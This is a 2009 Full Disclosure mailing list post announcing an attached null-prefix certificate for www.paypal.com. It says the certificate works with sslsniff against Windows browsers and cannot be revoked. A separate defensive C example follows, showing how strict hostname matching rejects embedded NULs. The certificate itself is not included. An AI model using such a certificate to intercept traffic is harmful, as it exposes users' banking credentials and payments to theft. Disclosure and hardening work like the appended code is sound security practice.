Full Disclosure mailing list archives
null-prefix certificate for paypal
From: Tim Jones <timjonesowns () yahoo com>
Date: Mon, 5 Oct 2009 10:59:31 -0700 (PDT)
If there's really a Moxie Marlinspike fan club [1], I'm definitely a member.. Attached is one of the null-prefix certificates [2] that he distributed during his "intercepting secure communication" training at Black Hat. This one's for www.paypal.com, and since the Microsoft crypto api appears to remain unpatched, it works flawlessly with sslsniff [3] against all clients on Windows (IE, Chrome, Safari). Also, because of Moxie's attacks against OCSP [4], I don't think this certificate can be revoked. Enjoy!

[1]: http://www.linuxtoday.com/security/2009100102035NWNT
[2]: http://www.thughtcrime.org/papers/null-prefix-attacks.pdf
[3]: http://www.thoughtcrime.org/software/sslsniff/
[4]: http://www.thoughtcrime.org/papers/ocsp-attack.pdf
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
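For readers checking their own certificate-validation code against the null-prefix problem named in the message above, here is an added example that is not part of the original post or of any tool it mentions. It contrasts a hostname match that treats the certificate name as a C string with one that honours the ASN.1 length and rejects embedded NULs. The struct, the function names and the sample name (placeholder domains) are hypothetical and constructed for illustration.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* A certificate name as ASN.1 stores it: bytes plus an explicit length. */
struct cert_name { const unsigned char *data; size_t len; };

/* Constructed sample: a name with an embedded NUL (placeholder domains). */
static const unsigned char SAMPLE[] = "www.example.com\0.attacker.example";
static const struct cert_name SAMPLE_CN = { SAMPLE, sizeof SAMPLE - 1 };

/* Case-insensitive comparison of exactly n bytes. */
static int ieq(const unsigned char *a, const char *b, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (tolower(a[i]) != tolower((unsigned char)b[i])) return 0;
    return 1;
}

/* Weak: treats the name as a C string, so its length ends at the first NUL. */
int match_cstring(const struct cert_name *cn, const char *host) {
    size_t n = strlen((const char *)cn->data);
    return n == strlen(host) && ieq(cn->data, host, n);
}

/* Check: any NUL inside the declared length means reject the certificate. */
int has_embedded_nul(const struct cert_name *cn) {
    return memchr(cn->data, '\0', cn->len) != NULL;
}

/* Hardened: reject embedded NULs and compare over the full ASN.1 length. */
int match_strict(const struct cert_name *cn, const char *host) {
    if (has_embedded_nul(cn)) return 0;
    size_t n = strlen(host);
    return cn->len == n && ieq(cn->data, host, n);
}

int main(void) {
    printf("cstring=%d strict=%d nul=%d\n",
           match_cstring(&SAMPLE_CN, "www.example.com"),
           match_strict(&SAMPLE_CN, "www.example.com"),
           has_embedded_nul(&SAMPLE_CN));
    return 0;
}
```

The same `has_embedded_nul` test applies to every dNSName entry in subjectAltName, not only the common name.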